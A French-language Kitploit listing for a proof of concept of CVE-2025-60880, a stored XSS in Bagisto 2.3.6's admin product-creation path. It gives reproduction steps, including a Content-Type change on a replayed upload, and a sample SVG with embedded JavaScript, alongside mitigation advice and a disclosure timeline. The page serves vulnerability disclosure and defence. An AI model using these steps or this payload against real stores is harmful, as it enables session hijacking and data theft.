Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-60880 — Preuve de concept pour une vulnérabilité XSS stockée dans le panneau d'administration de Bagisto, démontrant le téléchargement d'un SVG avec du JavaScript malveillant et fournissant des recommandations d'atténuation. | Kitploit
Outils/GitHubGitHub/shenal01/cve-2025-60880
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebApprentissage et Éducation
GitHubshenal01/cve-2025-60880

CVE-2025-60880

Preuve de concept pour une vulnérabilité XSS stockée dans le panneau d'administration de Bagisto, démontrant le téléchargement d'un SVG avec du JavaScript malveillant et fournissant des recommandations d'atténuation.

Voir le dépôt
1il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-60880 : Cross-Site Scripting (XSS) stocké dans le panneau d'administration de Bagisto

Une vulnérabilité XSS stockée authentifiée existe dans le chemin de création de produits du panneau d'administration de Bagisto 2.3.6, permettant à un attaquant de téléverser un fichier SVG conçu contenant du code JavaScript malveillant. Cette vulnérabilité peut être exploitée par un utilisateur administrateur authentifié pour exécuter du JavaScript arbitraire dans le navigateur, pouvant potentiellement conduire à un détournement de session, un vol de données ou des actions non autorisées.


Présentation de la vulnérabilité

  • Identifiant CVE : CVE-2025-60880
  • Type : Cross-Site Scripting (XSS)
  • Score CVSS : 6,9 (Moyen)
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
  • Éditeur concerné : Bagisto
  • Produit concerné : Bagisto
  • Version concernée : v2.3.6
  • Composant concerné : Panneau d'administration de Bagisto (chemin de création de produits)
  • Vecteur d'attaque : À distance
  • Authentification : Privilèges administrateur requis
  • Impact : Exécution de code, détournement de session, vol de données

Preuve de concept (PoC)

La vulnérabilité est exploitée lorsqu'un administrateur authentifié téléverse un fichier SVG conçu contenant du JavaScript malveillant.

Étapes pour reproduire :

  1. Connectez-vous au panneau d'administration de Bagisto en tant qu'administrateur authentifié.
  2. Accédez au chemin de création de produits.
  3. Téléversez un fichier SVG conçu contenant une charge utile JavaScript.
  4. La requête est rejouée après modification de l'en-tête Content-Type.
  5. Le fichier SVG malveillant est stocké sur le serveur.
  6. Lorsque l'URL du fichier est consultée, le JavaScript s'exécute dans le navigateur de l'utilisateur.

Exemple de charge utile SVG malveillante :

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

Recommandations

  • Pour atténuer cette vulnérabilité, les actions suivantes sont recommandées :
  • Appliquer une validation des entrées, un contrôle du type de contenu et une gestion appropriée des fichiers.
  • Restreindre les téléversements de fichiers aux formats de confiance et assainir les fichiers SVG pour supprimer tout contenu potentiellement dangereux.

Chronologie de divulgation

DateAction
AOÛT 2025Vulnérabilité découverte
AOÛT 2025Divulgation responsable
AOÛT 2025Demande d'identifiant CVE auprès de MITRE
OCT. 2025CVE attribué, divulgation publique

Avertissement

Les informations et le code de preuve de concept (PoC) fournis dans ce dépôt sont destinés uniquement à des fins éducatives et de recherche éthique. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par les informations ou le code fournis ici. L'utilisateur assume l'entière responsabilité de ses actions. Il incombe à l'utilisateur de s'assurer qu'il respecte toutes les lois locales, nationales et fédérales applicables.

Télécharger l’outil